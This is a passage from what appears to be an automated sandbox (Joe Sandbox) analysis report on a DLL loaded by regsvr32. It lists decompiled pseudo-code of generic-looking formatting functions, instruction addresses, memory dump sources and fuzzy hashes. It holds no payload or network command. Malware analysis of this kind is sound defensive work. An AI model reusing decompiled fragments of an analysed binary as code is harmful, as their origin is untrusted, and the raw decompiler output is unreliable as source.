				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001cce8;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t129 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001cc76;
				_t146 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001cb83;
				goto 0x8001cb83;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t146,  *((intOrPtr*)(__rcx + 8)));
				if (_t146 != 0) goto 0x8001cc9e;
				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
				 *((char*)(_t131 + 0x4c)) = 0;
				r8b = bpl;
				if (_t140 != 8) goto 0x8001ccb8;
				0x800216b8();
				goto 0x8001ccbf;
				E00000001180020140( *((intOrPtr*)(_t129 - 8)), _t131, _t146);
				if (0 == 0) goto 0x8001cce6;
				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001ccd8;
				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001cce6;
				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001cb18
                                                                                                              0x18001cb1d
                                                                                                              0x18001cb22
                                                                                                              0x18001cb2c
                                                                                                              0x18001cb2f
                                                                                                              0x18001cb32
                                                                                                              0x18001cb35
                                                                                                              0x18001cb38
                                                                                                              0x18001cb3e
                                                                                                              0x18001cb40
                                                                                                              0x18001cb42
                                                                                                              0x18001cb4b
                                                                                                              0x18001cb54
                                                                                                              0x18001cb59
                                                                                                              0x18001cb62
                                                                                                              0x18001cb68
                                                                                                              0x18001cb70
                                                                                                              0x18001cb8a
                                                                                                              0x18001cb8f
                                                                                                              0x18001cb97
                                                                                                              0x18001cb9e
                                                                                                              0x18001cba4
                                                                                                              0x18001cbab
                                                                                                              0x18001cbb8
                                                                                                              0x18001cbc8
                                                                                                              0x18001cbcf
                                                                                                              0x18001cbd5
                                                                                                              0x18001cbdf
                                                                                                              0x18001cbe9
                                                                                                              0x18001cbf0
                                                                                                              0x18001cbf7
                                                                                                              0x18001cbfd
                                                                                                              0x18001cc02
                                                                                                              0x18001cc0b
                                                                                                              0x18001cc14
                                                                                                              0x18001cc1a
                                                                                                              0x18001cc1f
                                                                                                              0x18001cc23
                                                                                                              0x18001cc26
                                                                                                              0x18001cc2d
                                                                                                              0x18001cc31
                                                                                                              0x18001cc3c
                                                                                                              0x18001cc41
                                                                                                              0x18001cc47
                                                                                                              0x18001cc4e
                                                                                                              0x18001cc5b
                                                                                                              0x18001cc67
                                                                                                              0x18001cc6b
                                                                                                              0x18001cc6d
                                                                                                              0x18001cc71
                                                                                                              0x18001cc79
                                                                                                              0x18001cc89
                                                                                                              0x18001cc90
                                                                                                              0x18001cc98
                                                                                                              0x18001cc9a
                                                                                                              0x18001cc9e
                                                                                                              0x18001cca2
                                                                                                              0x18001ccac
                                                                                                              0x18001ccb1
                                                                                                              0x18001ccb6
                                                                                                              0x18001ccba
                                                                                                              0x18001ccc7
                                                                                                              0x18001cccd
                                                                                                              0x18001ccd6
                                                                                                              0x18001ccd8
                                                                                                              0x18001cce0
                                                                                                              0x18001cce3
                                                                                                              0x18001ccfc

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 22c7844e140ff258f1473e52899db42f9fcb0ede445d1f1526c07c29eaab338e
                                                                                                              • Instruction ID: de41ab6eebb4cd2ff852e777581ac3486d46ac1ab37e2f80d0d2e20233902fb5
                                                                                                              • Opcode Fuzzy Hash: 22c7844e140ff258f1473e52899db42f9fcb0ede445d1f1526c07c29eaab338e
                                                                                                              • Instruction Fuzzy Hash: 4A51D573608A1882E7AA8F28C1957AC37A0E359FE8F148119EF4957798CF31DE45C7C9
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001ED30 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118001ED30(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t85;
				signed int _t89;
				void* _t109;
				intOrPtr _t110;
				signed int _t117;
				intOrPtr _t128;
				void* _t132;
				void* _t141;
				intOrPtr _t147;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t132 = __rcx;
				bpl = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				_t109 = _t85 - 5;
				if (_t109 > 0) goto 0x8001ee17;
				if (_t109 == 0) goto 0x8001ed80;
				_t110 = _t85;
				if (_t110 == 0) goto 0x8001ee6b;
				if (_t110 == 0) goto 0x8001edef;
				if (_t110 == 0) goto 0x8001edc8;
				if (_t110 == 0) goto 0x8001ee6b;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001ee37;
				_t89 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t141;
				if ((_t89 >> 0x00000004 & 0x00000001) == 0) goto 0x8001edb2;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001edb2;
				 *(__rcx + 0x28) = _t89 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ee96;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001eead;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ede9;
				goto 0x8001ed9b;
				goto 0x8001ed9b;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t117 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t117 == 0) goto 0x8001ee11;
				goto 0x8001ed9b;
				goto 0x8001ed9b;
				if (_t117 == 0) goto 0x8001ed80;
				if (_t117 == 0) goto 0x8001ed80;
				if (_t117 == 0) goto 0x8001ed80;
				goto 0x8001ed6e;
				_t128 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t128 + 0x30)) = 1;
				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001ef00;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t130 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001ee8e;
				_t147 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001ed9b;
				goto 0x8001ed9b;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001eeb6;
				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
				 *((char*)(_t132 + 0x4c)) = 0;
				r8b = bpl;
				if (_t141 != 8) goto 0x8001eed0;
				E000000011800221FC(_t132, _t147);
				goto 0x8001eed7;
				E00000001180020C3C( *((intOrPtr*)(_t130 - 8)), _t132, _t147);
				if (0 == 0) goto 0x8001eefe;
				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001eef0;
				if ( *((char*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001eefe;
				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001ed30
                                                                                                              0x18001ed35
                                                                                                              0x18001ed3a
                                                                                                              0x18001ed44
                                                                                                              0x18001ed47
                                                                                                              0x18001ed4a
                                                                                                              0x18001ed4d
                                                                                                              0x18001ed50
                                                                                                              0x18001ed56
                                                                                                              0x18001ed58
                                                                                                              0x18001ed5a
                                                                                                              0x18001ed63
                                                                                                              0x18001ed6c
                                                                                                              0x18001ed71
                                                                                                              0x18001ed7a
                                                                                                              0x18001ed80
                                                                                                              0x18001ed88
                                                                                                              0x18001eda2
                                                                                                              0x18001eda7
                                                                                                              0x18001edaf
                                                                                                              0x18001edb6
                                                                                                              0x18001edbc
                                                                                                              0x18001edc3
                                                                                                              0x18001edd0
                                                                                                              0x18001ede0
                                                                                                              0x18001ede7
                                                                                                              0x18001eded
                                                                                                              0x18001edf7
                                                                                                              0x18001ee01
                                                                                                              0x18001ee08
                                                                                                              0x18001ee0f
                                                                                                              0x18001ee15
                                                                                                              0x18001ee1a
                                                                                                              0x18001ee23
                                                                                                              0x18001ee2c
                                                                                                              0x18001ee32
                                                                                                              0x18001ee37
                                                                                                              0x18001ee3b
                                                                                                              0x18001ee3e
                                                                                                              0x18001ee45
                                                                                                              0x18001ee49
                                                                                                              0x18001ee54
                                                                                                              0x18001ee59
                                                                                                              0x18001ee5f
                                                                                                              0x18001ee66
                                                                                                              0x18001ee73
                                                                                                              0x18001ee7f
                                                                                                              0x18001ee83
                                                                                                              0x18001ee85
                                                                                                              0x18001ee89
                                                                                                              0x18001ee91
                                                                                                              0x18001eea1
                                                                                                              0x18001eea8
                                                                                                              0x18001eeb0
                                                                                                              0x18001eeb2
                                                                                                              0x18001eeb6
                                                                                                              0x18001eeba
                                                                                                              0x18001eec4
                                                                                                              0x18001eec9
                                                                                                              0x18001eece
                                                                                                              0x18001eed2
                                                                                                              0x18001eedf
                                                                                                              0x18001eee5
                                                                                                              0x18001eeee
                                                                                                              0x18001eef0
                                                                                                              0x18001eef8
                                                                                                              0x18001eefb
                                                                                                              0x18001ef14

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f26e779c1328d351d580ea123a1487e150580b4aa449c0e83f8079676e62bfc7
                                                                                                              • Instruction ID: 0976c4a73b781be45647b54aee5d7287503300e686f2e75dd0ab1dce49238460
                                                                                                              • Opcode Fuzzy Hash: f26e779c1328d351d580ea123a1487e150580b4aa449c0e83f8079676e62bfc7
                                                                                                              • Instruction Fuzzy Hash: D251A473600E9882E7AA8F28D5543AC2BA0E35AB98F158116FF46177D9CF31DE85C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001CF2C Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001CF2C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t84;
				signed int _t88;
				void* _t108;
				intOrPtr _t109;
				signed int _t116;
				intOrPtr _t127;
				void* _t131;
				void* _t140;
				intOrPtr _t146;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t131 = __rcx;
				bpl = __edx;
				_t84 =  *((intOrPtr*)(__rcx + 0x34));
				_t108 = _t84 - 5;
				if (_t108 > 0) goto 0x8001d013;
				if (_t108 == 0) goto 0x8001cf7c;
				_t109 = _t84;
				if (_t109 == 0) goto 0x8001d067;
				if (_t109 == 0) goto 0x8001cfeb;
				if (_t109 == 0) goto 0x8001cfc4;
				if (_t109 == 0) goto 0x8001d067;
				if (_t84 - 0xffffffffffffffff != 1) goto 0x8001d033;
				_t88 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t140;
				if ((_t88 >> 0x00000004 & 0x00000001) == 0) goto 0x8001cfae;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001cfae;
				 *(__rcx + 0x28) = _t88 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d092;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001d0a9;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cfe5;
				goto 0x8001cf97;
				goto 0x8001cf97;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t116 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t116 == 0) goto 0x8001d00d;
				goto 0x8001cf97;
				goto 0x8001cf97;
				if (_t116 == 0) goto 0x8001cf7c;
				if (_t116 == 0) goto 0x8001cf7c;
				if (_t116 == 0) goto 0x8001cf7c;
				goto 0x8001cf6a;
				_t127 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t127 + 0x30)) = 1;
				 *((intOrPtr*)(_t127 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001d0fc;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t129 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001d08a;
				_t146 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001cf97;
				goto 0x8001cf97;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t146,  *((intOrPtr*)(__rcx + 8)));
				if (_t146 != 0) goto 0x8001d0b2;
				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
				 *((char*)(_t131 + 0x4c)) = 0;
				r8b = bpl;
				if (_t140 != 8) goto 0x8001d0cc;
				0x80021810();
				goto 0x8001d0d3;
				E00000001180020290( *((intOrPtr*)(_t129 - 8)), _t131, _t146);
				if (0 == 0) goto 0x8001d0fa;
				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001d0ec;
				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001d0fa;
				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001cf2c
                                                                                                              0x18001cf31
                                                                                                              0x18001cf36
                                                                                                              0x18001cf40
                                                                                                              0x18001cf43
                                                                                                              0x18001cf46
                                                                                                              0x18001cf49
                                                                                                              0x18001cf4c
                                                                                                              0x18001cf52
                                                                                                              0x18001cf54
                                                                                                              0x18001cf56
                                                                                                              0x18001cf5f
                                                                                                              0x18001cf68
                                                                                                              0x18001cf6d
                                                                                                              0x18001cf76
                                                                                                              0x18001cf7c
                                                                                                              0x18001cf84
                                                                                                              0x18001cf9e
                                                                                                              0x18001cfa3
                                                                                                              0x18001cfab
                                                                                                              0x18001cfb2
                                                                                                              0x18001cfb8
                                                                                                              0x18001cfbf
                                                                                                              0x18001cfcc
                                                                                                              0x18001cfdc
                                                                                                              0x18001cfe3
                                                                                                              0x18001cfe9
                                                                                                              0x18001cff3
                                                                                                              0x18001cffd
                                                                                                              0x18001d004
                                                                                                              0x18001d00b
                                                                                                              0x18001d011
                                                                                                              0x18001d016
                                                                                                              0x18001d01f
                                                                                                              0x18001d028
                                                                                                              0x18001d02e
                                                                                                              0x18001d033
                                                                                                              0x18001d037
                                                                                                              0x18001d03a
                                                                                                              0x18001d041
                                                                                                              0x18001d045
                                                                                                              0x18001d050
                                                                                                              0x18001d055
                                                                                                              0x18001d05b
                                                                                                              0x18001d062
                                                                                                              0x18001d06f
                                                                                                              0x18001d07b
                                                                                                              0x18001d07f
                                                                                                              0x18001d081
                                                                                                              0x18001d085
                                                                                                              0x18001d08d
                                                                                                              0x18001d09d
                                                                                                              0x18001d0a4
                                                                                                              0x18001d0ac
                                                                                                              0x18001d0ae
                                                                                                              0x18001d0b2
                                                                                                              0x18001d0b6
                                                                                                              0x18001d0c0
                                                                                                              0x18001d0c5
                                                                                                              0x18001d0ca
                                                                                                              0x18001d0ce
                                                                                                              0x18001d0db
                                                                                                              0x18001d0e1
                                                                                                              0x18001d0ea
                                                                                                              0x18001d0ec
                                                                                                              0x18001d0f4
                                                                                                              0x18001d0f7
                                                                                                              0x18001d110

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4298a62159fac09ebd01b71a931dbc2732877b2c0b4e5ce9af547f02137ebefe
                                                                                                              • Instruction ID: 103fbf33e8fdda31f616bee1c182d148fe13f3e2d32abbd614d7b636e4a8abb2
                                                                                                              • Opcode Fuzzy Hash: 4298a62159fac09ebd01b71a931dbc2732877b2c0b4e5ce9af547f02137ebefe
                                                                                                              • Instruction Fuzzy Hash: 6051B073604A5886E7AB8F28C0547AC37A1E35DB98F14811AFF4917799CF31CE8AC784
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180028668 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ae4010d5c02622d45c3023169cc2fc24815e6c6196ab7ccb4dfcedae1b753b5
                                                                                                              • Instruction ID: 3a5678472c41ba3675a28a4bf149654bdd87f9c2efeded7d4409bacc4e77e48f
                                                                                                              • Opcode Fuzzy Hash: 0ae4010d5c02622d45c3023169cc2fc24815e6c6196ab7ccb4dfcedae1b753b5
                                                                                                              • Instruction Fuzzy Hash: 6741B03A109B8881E7A68F29C0453AE37A0FB49BECF288215EF580B7E5CF35C545D700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180028514 Relevance: .1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                                                              • Instruction ID: c0c79d2cdd3fd598488dca8624397d056c0b7882e38bb28c650daa9d12ba35b8
                                                                                                              • Opcode Fuzzy Hash: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                                                              • Instruction Fuzzy Hash: 79418E76204B8881E7A68F2AD0853AD3BA1E749BACF188215EF5D0B7E5CF39C555C704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800287E4 Relevance: .1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                                                              • Instruction ID: 7116f99495145c24ae3106d899c67866308e3919e9d1a8719d9619277fc22a0f
                                                                                                              • Opcode Fuzzy Hash: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                                                              • Instruction Fuzzy Hash: FF41BF76204B8881E7A68F2AC0813AD3BA1F749BACF188215EF5D0B7E9CF35C585D700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180017000 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 422c5888bca56d31bd951c6cd97c2e3b14856c5be7dfdc2378b5077d0c6dfac3
                                                                                                              • Instruction ID: 699baa2efa8000a59b8f799c11ffb31ba8d373e89daeb9de3a1e5202e9920b1b
                                                                                                              • Opcode Fuzzy Hash: 422c5888bca56d31bd951c6cd97c2e3b14856c5be7dfdc2378b5077d0c6dfac3
                                                                                                              • Instruction Fuzzy Hash: 07317372214B94C6DBA28F29E0503AD7BB0E38CB8CF248115EB8C4B752CF36C596CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001A098 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 077f3aff6a53c3673b78d5ba69e8f8e4682316bba1353c0c616dc6c4d0aba232
                                                                                                              • Instruction ID: 49eb1ae5f09e1f07836a4ba45efd9eaea9e43899819bb928a697fc02e1ca6435
                                                                                                              • Opcode Fuzzy Hash: 077f3aff6a53c3673b78d5ba69e8f8e4682316bba1353c0c616dc6c4d0aba232
                                                                                                              • Instruction Fuzzy Hash: C131C272208B9496EB628F29D4403AD7BA0F38DB9CF248115EB8C4B351DF3AC596CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800190D8 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
